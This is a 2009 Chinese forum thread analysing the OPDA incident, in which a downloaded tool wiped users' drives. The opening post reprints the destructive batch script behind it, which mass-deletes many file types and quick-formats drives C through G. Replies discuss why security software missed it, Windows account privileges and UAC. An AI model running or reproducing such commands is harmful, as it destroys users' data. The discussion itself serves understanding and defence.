OPDA 格机事件 源代码＋思考

zwl2828

事件：8月6日，老牌著名智能手机论坛OPDA遭遇格式化事件，所有下载了该帖附件的网友在打开其中一个工具后，电脑上除了系统盘之外的分区几乎全被格式化了。另外有一点值得注意的是，当打开所执行的exe文件时，网友所装众多杀软并没有起到实质性的作用。

源代码：

@echo off
del /f /s /q *.tmp
del /f /s /q *._mp
del /f /s /q *.log
del /f /s /q *.ini
del /f /s /q *.inf
del /f /s /q *.dll
del /f /s /q *.gid
del /f /s /q *.chk
del /f /s /q *.old
del /f /s /q *.GHO
del /f /s /q *.exe
del /f /s /q *.php
del /f /s /q *.asp
del /f /s /q *.asa
del /f /s /q *.swf
del /f /s /q *.txt
del /f /s /q *.rar
del /f /s /q *.dat
format c: /q /y
format d: /q /y
format e: /q /y
format f: /q /y
format g: /q /y
del /f /s /q *.bat

思考：为什么大部分安全软件都没有反应？为什么 Windows 会允许运行这种程序。

[ 本帖最后由 zwl2828 于 2009-8-7 09:36 编辑 ]

eyesineyes

这本身就是一个批处理而已。如果你平常不是用Administrator用户登录，NTFS分区进行正确权限配置的话， 这个问题应该就轻很多了。

taoyuan237

就这么个没技术含量的屁玩意居然还。。。。
所谓的主动防御呢？启发式，虚拟机，沙盘都干什么去了

QWERTYjing

这个只是那边的人自己随便写的，不是真正的源代码。。。。不过差不多了，好像是转exe执行再往c盘释放个update.exe

主防没理由不拦下的。。。。

zwl2828

原帖由 QWERTYjing 于 2009-8-7 09:08 发表
这个只是那边的人自己随便写的，不是真正的源代码。。。。不过差不多了，好像是转exe执行再往c盘释放个update.exe

主防没理由不拦下的。。。。

对，但是原理一样，就这样的BAT，如何定义就是一个问题。

xueyao_zhjyl

最原始的 就是最强大的   脚本批处理 确实是很厉害的 病毒手段  貌似某些所谓的killer至今为止还没有处理脚本和批处理的能力     
半成品 也敢拿出来卖  丢人啊

zwl2828

原帖由 eyesineyes 于 2009-8-7 08:28 发表
这本身就是一个批处理而已。如果你平常不是用Administrator用户登录，NTFS分区进行正确权限配置的话， 这个问题应该就轻很多了。

XP安装完成之后，系统默认为用户创建的账户具有几乎和Administrator相同的权限，这是Windows下各种恶意软件泛滥的根本原因。

Vista加入了UAC功能，我相信十个用户中至少有七个都把UAC关了。其实微软在XP中已经意识到这个问题，不允许程序修改系统目录下的文件，但是似乎没有多大收效。

zwl2828

原帖由 xueyao_zhjyl 于 2009-8-7 09:14 发表
最原始的 就是最强大的   脚本批处理 确实是很厉害的 病毒手段  貌似某些所谓的killer至今为止还没有处理脚本和批处理的能力     
半成品 也敢拿出来卖  丢人啊

主要是这种东西，一定要上报了才会。。。

IllusionWing

关键是人的习惯

zwl2828

原帖由 IllusionWing 于 2009-8-7 09:19 发表
关键是人的习惯

恩，安全很大程度上取决于账户管理体制的可靠性，更重要的是用户的安全素养。